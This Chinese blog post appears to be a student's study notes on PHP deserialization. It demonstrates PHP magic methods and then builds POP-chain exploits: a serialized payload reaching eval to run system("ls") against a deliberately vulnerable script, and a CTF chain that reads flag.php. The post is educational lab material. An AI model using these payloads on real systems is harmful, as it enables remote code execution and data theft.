PHP反序列化学习笔记

最新推荐文章于 2024-10-02 23:04:10 发布
最新推荐文章于 2024-10-02 23:04:10 发布
阅读量430 收藏 9
点赞数 3
文章标签: 学习 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zbnedjjs/article/details/138889477
版权

什么是序列化(serialization)?

序列化是指将对象的状态属性转化为可存储传输的形式的过程。

序列化后的表达形式:

反序列化:

就是将字符串反序列化装换成对象。

转换后有以下特性:

1.反序列化的字符可以覆盖预定义对象的值。

2.反序列化不会触发方法。除非有魔术方法

魔术方法:

一个预定义的,在特定情况下自动触发的方法。

_constract();

构造函数,在实例化一个对象的时候会去自动执行的一个方法。

<?php
highlight_file(__FILE__);
class User {
    public $username;
    public function __construct($username) {
        $this->username = $username;
        echo "触发了构造函数1次" ;
    }
}
$test = new User("benben");
$ser = serialize($test);
unserialize($ser);

?>

/*$test = new User("benben");在new一个对象时
触发了构造函数1次*/

_destruct();

当对象引用完成或者对象销毁的时候触发。

<?php
highlight_file(__FILE__);
class User {
    public function __destruct()
    {
        echo "触发了析构函数1次"."<br />" ;
    }
}
$test = new User("benben");
$ser = serialize($test);
unserialize($ser);

?>
/*当 unserialize($ser);执行完成后触发第一次_destruct().
当程序执行完毕后销毁对象再次触发_destruct().
触发了析构函数1次
触发了析构函数1次*/

_sleep();

触发时机:在使用serialize()之前触发

<?php
class User {
    const SITE = 'uusama';
    public $username;
    public $nickname;
    private $password;
    public function __construct($username, $nickname, $password)    {
        $this->username = $username;
        $this->nickname = $nickname;
        $this->password = $password;
    }
    public function __sleep() {
        return array('username', 'nickname');
    }
}
$user = new User('a', 'b', 'c');
echo serialize($user);
?>
当serilaze调用触发__sleep()

_weackup():

触发时机:在使用unserialize()之后触发

<?php
highlight_file(__FILE__);
error_reporting(0);
class User {
    const SITE = 'uusama';
    public $username;
    public $nickname;
    private $password;
    private $order;
    public function __wakeup() {
        $this->password = $this->username;
    }
}
$user_ser = 'O:4:"User":2:{s:8:"username";s:1:"a";s:8:"nickname";s:1:"b";}';
var_dump(unserialize($user_ser));
?>
unserialize()之后触发魔术方法__wakeup()

_tostring():

触发时机:当对象被错误的调用为字符串时触发

<?php
highlight_file(__FILE__);
error_reporting(0);
class User {
    var $benben = "this is test!!";
         public function __toString()
         {
             return '格式不对,输出不了!';
          }
}
$test = new User() ;
print_r($test);
echo "<br />";
echo $test;
?>
错误使用print_r输出对象,触发魔术方法__toString()

_invoke():

触发时机:把对象当做函数调用时触发        

<?php
highlight_file(__FILE__);
error_reporting(0);
class User {
    var $benben = "this is test!!";
         public function __invoke()
         {
             echo  '它不是个函数!';
          }
}
$test = new User() ;
echo $test ->benben;
echo "<br />";
echo $test() ->benben;
?>
错误调用对象名字+()触发魔术方法__invoke()

_call():

触发时机:调用一个不存在的方法

<?php
highlight_file(__FILE__);
error_reporting(0);
class User {
    public function __call($arg1,$arg2)
    {
        echo "$arg1,$arg2[0]";
          }
}
$test = new User() ;
$test -> callxxx('a');
?>
当调用对象中不存在的方法callxx('a')触发__call($arg1,$arg2)魔术方法

_callstatic():

触发时机:静态调用或者调用成员常量时使用的方法不存在

<?php
highlight_file(__FILE__);
error_reporting(0);
class User {
    public function __callStatic($arg1,$arg2)
    {
        echo "$arg1,$arg2[0]";
          }
}
$test = new User() ;
$test::callxxx('a');
?>

当调用test下不存在的callxxx静态方法或者不存在的静态变量触发__callStatic($arg1,$arg2)魔术方法

_get():

触发时机:调用的成员属性不存在

<?php
highlight_file(__FILE__);
error_reporting(0);
class User {
    public $var1;
    public function __get($arg1)
    {
        echo  $arg1;
    }
}
$test = new User() ;
$test ->var2;
?>

_set():

触发时机:给不存在的成员属性赋值

_isset():

触发时机:对不可访问的属性使用isset()或者empty()

_unset():

触发时机:对不可访问的属性使用unset()

_clone():

触发时机:当使用clone关键字拷贝完成一个对象后,新对象会自动调用_clone()魔术方法

<?php
highlight_file(__FILE__);
error_reporting(0);
class User {
    private $var;
    public function __clone( )
    {
        echo  "__clone test";
          }
}
$test = new User() ;
$newclass = clone($test)
?>

pop链前置基础

<?php
highlight_file(__FILE__);
error_reporting(0);
class index {
    private $test;
    public function __construct(){
        $this->test = new normal();
    }
    public function __destruct(){
        $this->test->action();
    }
}
class normal {
    public function action(){
        echo "please attack me";
    }
}
class evil {
    var $test2;
    public function action(){
        eval($this->test2);
    }
}
unserialize($_GET['test']);
?>
  分析发现可利用的地方在eval($this->test2);
  反方向取寻找到:index->public function __destruct()魔术方法可能调用action
  分析发现可控参数test,可以传入反序列化对象覆盖index->test变量,让他的值是evil对象即可成功调用action
  反序列化覆盖index前,应该先把evil中的test2变量传入想要的值,然后反序列化覆盖原来空值

pyload:

<?php
class index {
    var $test;

}
class evil {
    var $test2;
}
$a=new evil();
$a->test2='system("ls");';
$b=new index();
$b->test=$a;
echo serialize($b);
?>
注意:
输出的值还不是最终结果,还需修改:
1:private属性的变量受保护,反序列化后为%00value%00,所以要修改长度和值
2:"system("ls")"还需要添加一个分号

最终pyload:?test=O:5:"index":1:{s:11:"%00index%00test";O:4:"evil":1:{s:5:"test2";s:13:"system("ls");";}}

POP链经典例题:

flag in flag.php
<?php
class Modifier {
    private $var="flag.php";
    public function append($value)
    {
        include($value);
        echo $flag;
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __toString(){
        return $this->str->source;
    }
    public function __wakeup(){
        echo $this->source;
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}


构造pyload:
$test=new Test();
$modifier=new Modifier();
$show=new Show();
$test->p=$modifier;
$show->str=$test;
$show->source=$show;
echo serialize($show);
将显示的结果私有属性处改为%00object%00value,并修改长度即可

zbnedjjs
关注
JAVA序列化和反序列化学习笔记
snowlyzz的博客
10-31 333
JAVA反序列化学习
长亭php反序列化防护_PHP反序列化笔记
weixin_40006977的博客
12-21 949
本文作者:是大方子(Ms08067实验室核心成员)﹀﹀﹀目录目录private变量与protected变量序列化后的特点序列化后的字段长度前面可以加+题目解题步骤CVE-2016-7124漏洞介绍演示代码题目解题步骤PHP Session 反序列化PHP的3种序列化处理器安全问题当 session.auto_start=Off 时测试Demo题目解题步骤phar反序列化private变量与prot...
php反序列化绕过,【技术分享】PHP反序列化漏洞
weixin_36239768的博客
03-19 505
前言序列化给我们传递对象提供了一种简单的方法serialize()将一个对象转换成一个字符串unserialize()将字符串还原为一个对象。此类函数的使用本身没有危害,但是传入反序列化函数的字符串用户可控的时候就会存在漏洞——PHP对象注入正文POP链序列化的关键在于能够在目标代码当中找到一条可以控制的POP链,POP链就是class A调用了class B的方法,class B还调用了其他方法...
PHP反序列化学习笔记(CTF)
就是我的博客
08-26 936
ctf中php反序列化学习
PHP反序列化总结
weixin_44449397的博客
01-19 518
去年我首发在先知社区的文章,现在把它转载过来php反序列化完整总结 - 先知社区 (aliyun.com)花些时间把四种常见的php反序列化总结了一遍,各自都找了简单示例和例题,参考了一些师傅的链接加上自己的理解,参考链接放在文末。
反序列化学习笔记【一文打通ctf中的反序列化题目】
jayq1的博客
07-21 5182
本文包含反序列化的各类题目,比如基础的php反序列化 反序列化字符逃逸 phar反序列化 Pickle反序列化 师傅们轻点喷~
php反序列化学习之字符串逃逸
m0_54903333的博客
04-28 673
php反序列化时,会严格按照字符串长度来读取后面的字符串,如果长度不对,就会反序列化失败,返回一个布尔变量false,我看其他大佬的文章这里都会报错,可能是php版本不同,如:我们把原来的4改为3,php在读取时就会往后面读取3个字符:nam,然后结束这个字符串的读取**,正常来说接下来该读取结束符 “;来构成闭合,但是没有,而是读取到了e,于是反序列化失败**,返回false,如果改为5,就会读取 name” 然后结束,也是无法闭合而失败。
php 反序列化总结
m0_64815693的博客
12-02 3803
php 反序列化从零开始到啥也不会 横批:一篇足以
CTF_Web:反序列化学习笔记(一)php中的类与对象
AFCC_的博客(Web_Dog)
08-13 1797
0x00 前言 前期第一次遇到反序列化这方面题目的时候,也看了不少资料,都是前辈们写的总结,但是都是直接从在ctf中的运用开始的,自己在这段时间整理的过程中,发现对于php类与对象了解不是很多,导致在看一些题目、或值前辈的总结时都比较困难,下面参考php文档,结合自己对php类与对象的理解先把反序列化的基础知识做一下整理。 0x01 php类与对象 class 在php手册中这样介绍: 每个类的定义都以关键字 class 开头,后面跟着类名,后面跟着一对花括号,里面包含有类的属性与方法
php之Memcache学习笔记
12-19
PHP之Memcache学习笔记】 Memcache是一种广泛用于Web应用中的高性能分布式内存对象缓存系统。它能够在服务器集群中提供快速的数据存储和检索,减轻数据库的负担,提高应用程序的性能。在本文中,我们将深入探讨...
我的php学习笔记(毕业设计)
10-28
总体来说,本篇PHP学习笔记包含了PHP的基本语法、面向对象编程的高级特性、设计模式的实际应用以及数据的序列化与反序列化等内容,这些内容是构建PHP应用程序时不可或缺的部分。对于想要学习PHP或者加深对PHP理解的...
PHP反序列化
2ed
10-30 380
文章简介:# PHP反序列化学习笔记。 目录:# 序列化与反序列化 相关函数 1. serialize()函数 2 .unserialize()函数 序列化的不同结果 例题:D0g3CTF 总结 参考文献 序列化与反序列化# 说到反序列化,就不得不说序列化。 序列化:把对象、数组、字符串等转化为字节序列的过程称为序列化 反序列化:把字节序列恢复为对象、数组、字符串...
java byte序列化,java对象序列化byte[] and byte[]反序列化对象--转
weixin_36218209的博客
03-19 1146
import java.io.ByteArrayInputStream;import java.io.ByteArrayOutputStream;import java.io.IOException;import java.io.ObjectInputStream;import java.io.ObjectOutputStream;public class ObjectAndByte {/*** ...
10.2学习
2401_87363162的博客
10-02 1131
​ Spring AOP就是基于动态代理的,如果要代理的对象,实现了某个接⼝,那么Spring AOP会使⽤JDKProxy,去创建代理对象,⽽对于没有实现接⼝的对象,就⽆法使⽤ JDK Proxy 去进⾏代理了,这时候Spring AOP会使⽤基于asm框架字节流的Cglib动态代理 ,这时候Spring AOP会使⽤ Cglib ⽣成⼀个被代理对象的⼦类来作为代理。每个线程中都有一个自己的ThreadLocalMap类对象,可以将线程自己的对象保持到其中,各管各的,线程可以正确的访问到自己的对象。
从0学习React(3)
qq_54432917的博客
09-29 790
在第一篇文章中,我们对index.tsx文件的每一行代码都做了简单的分析。通过第一篇文章的总结,我也大致知道了index.tsx里的很多语法。而第二篇文章,我对index.tsx文件的框架做了一个大致的分析,通过第二篇文章,我对index.tsx有了进一步的认识。按理来讲,第三篇文章我还是解析index.tsx文件,但是我发现,对于前两篇文章,其实我对语法的细节有很多不明白的点。因此这篇文章,我就把React的一些最基础的知识给梳理一下,帮助我更好的理解index.tsx的代码。
Go基础学习10-原子并发包sync.atomic的使用:CSA、Swap、atomic.Value......
最新发布
FLJS_T的博客
10-02 948
原子操作sync.atomic以及原子变量atomic.Value详细介绍。go中原生的支持原子操作的函数支持的变量类型int32、int64、uint32、uint64、uintptr,以及unsafe包中的Pointer。对于上述原子操作类型中的每一个,可以支持的数据类型有:==int32、int64、uint32、uint64、uintptr,以及unsafe包中的Pointer。但是否sync.Mutex变量能够保证操作的原子性。atomic.Value类型是开箱即用的,我们声明一个该类型的变量
6.824 Lab 2C 学习记录
kingsill的博客
09-29 326
最后10s,开始的时候,恢复网络,插入一个数据,等待这个数据被提交,如果超过这10s就报错。2C的test中的unreliable figure8算是给博主的迎头一棒,需要根据raft论文的figure8进行解决,leader。根据前任及博主自己的经验,unreliable figure8的除了上述这一点以外,需要对。博主由于之前的不严谨,给自己留下了很大的改进困难,最后不得不重构代码。进行一定的设计,可以参考课程里老师提出的意见。一下为博主的github仓库,需要的可以参考。有一定的考验,那么就需要对。
【DirectX sdk 学习使用】
qq_41610493的博客
10-01 368
设置包含目录:打开你的项目属性,导航到VC++目录,然后在包含目录中添加DirectX SDK的Include文件夹路径。设置库目录:同样在VC++目录中,在库目录中添加DirectX SDK的Lib文件夹路径。运行安装程序:下载完成后,找到下载的安装程序(通常是一个.exe文件),双击运行。选择安装路径:选择你希望安装DirectX SDK的路径,或者使用默认路径。如果你有任何问题或需要进一步的指导,请随时告诉我。接受许可协议:在安装向导中,阅读并接受许可协议。完成安装:点击“安装”按钮,等待安装完成。
深入理解PHP反序列化机制
"PHP反序列化详解,包括serialize()函数的使用,以及序列化过程的解析和示例" PHP反序列化PHP编程中的一个重要概念,它与序列化相反,是将通过序列化保存的字符串恢复成原始的PHP变量。在PHP中,`serialize()`...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值